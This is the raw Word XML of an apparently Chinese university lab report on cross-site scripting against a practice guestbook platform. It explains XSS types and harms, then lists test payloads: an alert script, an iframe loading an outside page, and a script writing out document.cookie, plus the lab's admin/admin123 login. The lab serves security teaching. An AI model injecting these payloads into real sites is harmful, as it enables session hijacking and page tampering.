                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>实验内容、原理分析及具体实验要求。</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>四、实验过程与分析</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:ind w:firstLine="420" w:firstLineChars="200"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>根据</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>具体</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>实验</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>，</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>记录</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>、</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>整理</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>相应命令、运行结果等，包括截图和文字说明</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>。</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:ind w:firstLine="420" w:firstLineChars="200"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>详细记录在实验过程中发生的故障和问题，</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>并</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>进行故障分析</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>，</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>说明故障排除的过程及方法。</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>五</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>、实验结果总结</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:ind w:firstLine="420" w:firstLineChars="200"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>对实验结果进行分析，</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>完成思考题目</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>，</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>总结</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>实验的心得体会</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>，并提出实验的</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                    <w:t>改进意见。</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>六、附录</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s2063" o:spid="_x0000_s2063" o:spt="203" style="height:241.8pt;width:414pt;" coordorigin="2185,6303" coordsize="7200,4212" editas="canvas">
            <o:lock v:ext="edit"/>
            <v:shape id="_x0000_s2062" o:spid="_x0000_s2062" o:spt="75" type="#_x0000_t75" style="position:absolute;left:2185;top:6303;height:4212;width:7200;" filled="f" o:preferrelative="f" stroked="f" coordsize="21600,21600">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke on="f" joinstyle="miter"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" text="t" aspectratio="t"/>
            </v:shape>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一、实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>深入理解跨站脚本共计概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>掌握形成跨站脚本漏洞的条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>掌握对跨站脚本的几种利用方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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pageBreakBefore/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验环境为Windows互联网主机，拓扑图如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4552315" cy="1409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52315" cy="140970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说明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1网络环境中有两台主机，有一台主机在实验环境可见并可登录，我们称为试验机（客户机）。另一台主机不可见，但可以从试验机访问，这台主机即为这次实验攻击的目标，我们称为目标机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.试验机IP为10.1.1.78 目标机IP为10.1.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.在目标主机上安装了跨站脚本攻击演练的平台，供本次实验用。</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pageBreakBefore/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验内容与实验要求</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跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。</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2）XSS工作原理</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恶意web用户将代码植入到提供给其它用户使用的页面中，如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页面的时候，程序将数据库里面的信息输出，这些恶意代码就会被执行。</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3）XSS漏洞的分类</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1.本地利用漏洞，这种漏洞存在于页面中客户端脚本自身；</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2.反射式漏洞，这种漏洞和类型A有些类似，不同的是Web客户端使用Server端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经HTML实体编码，客户端代码便能够注入到动态页面中；</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3.存储式漏洞，该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄漏的可能，其中也包括了Web服务器的管理员。</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4）XSS攻击的危害</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1.盗取用户cookie；</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2.盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号；</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3.控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力；</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4.盗窃企业重要的具有商业价值的资料；</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5.强制发送电子邮件；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>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      6.网站挂马；</w:t>
      </w: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pageBreakBefore/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>四、实验过程与分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验步骤一：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动并访问留言系统；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>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使用远程桌面登录至练习主机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>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使用浏览器打开http://10.1.1.2页面，进入跨站脚本攻击演练平台，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:right="0" w:rightChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2535555"/>
            <wp:effectExtent l="0" t="0" r="254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535555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:right="0" w:righ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给留言系统添加留言，熟悉本系统环境。</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4、管理留言。</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点击“管理留言”，用户名：admin，密码：admin123，可以对刚留言进行管理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存储式跨站脚本漏洞检测</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1、登录到实验机上，用IE浏览器中打开留言系统（10.1.1.2）。</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2、在留言内容中填写包含有跨站测试的脚本，提交后观察返回效果。</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&lt;script&gt;alert("XSS TEST")&lt;/script&gt;</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如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3504565" cy="3085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504565" cy="3085465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="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刷新留言系统，如果新加留言显示如下，则说明系统有存储式跨站漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2341245"/>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3675" cy="2341245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验步骤二：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用存储式跨站漏洞窃取用户cookie</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使用跨站漏洞加载恶意网页</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清空实验一任务，将恶意网页（假设http://www.heetian.com）放入留言系统数据库，并在用户端执行；</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1、增加一留言，并在留言内容中改为 &lt;iframe src="http://www.heetian.com"&gt;&lt;/iframe&gt;，测试返回效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验步骤三：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用存储式跨站漏洞窃取用户cookie</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1、继续添加留言，包含以下内容：&lt;script&gt;document.write(document.cookie)&lt;/script&gt;</w:t>
